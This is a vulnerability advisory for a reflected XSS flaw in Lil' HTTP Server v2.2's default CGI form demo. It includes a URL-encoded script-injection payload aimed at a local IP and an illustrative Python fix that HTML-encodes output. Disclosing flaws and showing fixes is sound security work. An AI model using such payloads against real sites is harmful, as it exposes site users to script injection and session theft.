Lil' HTTP Server version 2.2 suffers from a cross site scripting vulnerability in a default CGI script.
1cd00218bbd303ceb7a7c683ad4f9e471fe94b3e8bd6679f9bf4aab7ee9035d7
Lil' HTTP Server v2.2 Default CGI Form XSS Vulnerability
Description :
Lil' HTTP Server v2.2 comes with some default applications.
The "CGI Form Demo" application allows you to submit your name and e-mail. There is an XSS vulnerability in the submit application: the submitted value is reflected in the response without HTML encoding.
Sample :
http://192.168.1.102/pbcgi.cgi?name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E
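The fix for this class of bug is to HTML-encode form values at output time. The following is an added example, not code from Lil' HTTP Server or from the advisory's author: the source of pbcgi.cgi is not shown on this page, so the response template and the function names are assumptions made for illustration. It decodes the sample request above and renders it both ways.

```python
from html import escape
from urllib.parse import urlsplit, parse_qs

# Sample request from the advisory (query string exactly as published).
SAMPLE_URL = ("http://192.168.1.102/pbcgi.cgi?name="
              "%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E")

# Hypothetical response template; the real demo page's markup is not on this page.
PAGE = "<html><body><p>Thank you, {name}.</p><p>E-mail: {email}</p></body></html>"


def form_fields(url):
    """Decode the query string the way a CGI form handler receives it."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: values[0] for key, values in qs.items()}


def render_unescaped(fields):
    """Behaviour the advisory describes: the value is echoed verbatim."""
    return PAGE.format(name=fields.get("name", ""),
                       email=fields.get("email", ""))


def render_escaped(fields):
    """Hardened form: HTML-encode every user-supplied value on output."""
    return PAGE.format(
        name=escape(fields.get("name", ""), quote=True),
        email=escape(fields.get("email", ""), quote=True),
    )


def has_active_markup(html_doc):
    """Demo-only check: did a literal <script> tag reach the response body?"""
    return "<script" in html_doc.lower()


if __name__ == "__main__":
    fields = form_fields(SAMPLE_URL)
    print("decoded name:", fields["name"])
    print("unescaped response carries a script tag:",
          has_active_markup(render_unescaped(fields)))
    print("escaped response carries a script tag:",
          has_active_markup(render_escaped(fields)))
```

Encoding at the point of output, rather than filtering on input, is what keeps the doubled `<<` in the sample from slipping past a naive tag-stripping filter.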
Reference :
- http://treasuresec.com [Treasure's Security Blog]
- http://www.summitcn.com/lilhttp/lildocs.html
- http://en.wikipedia.org/wiki/Cross-site_scripting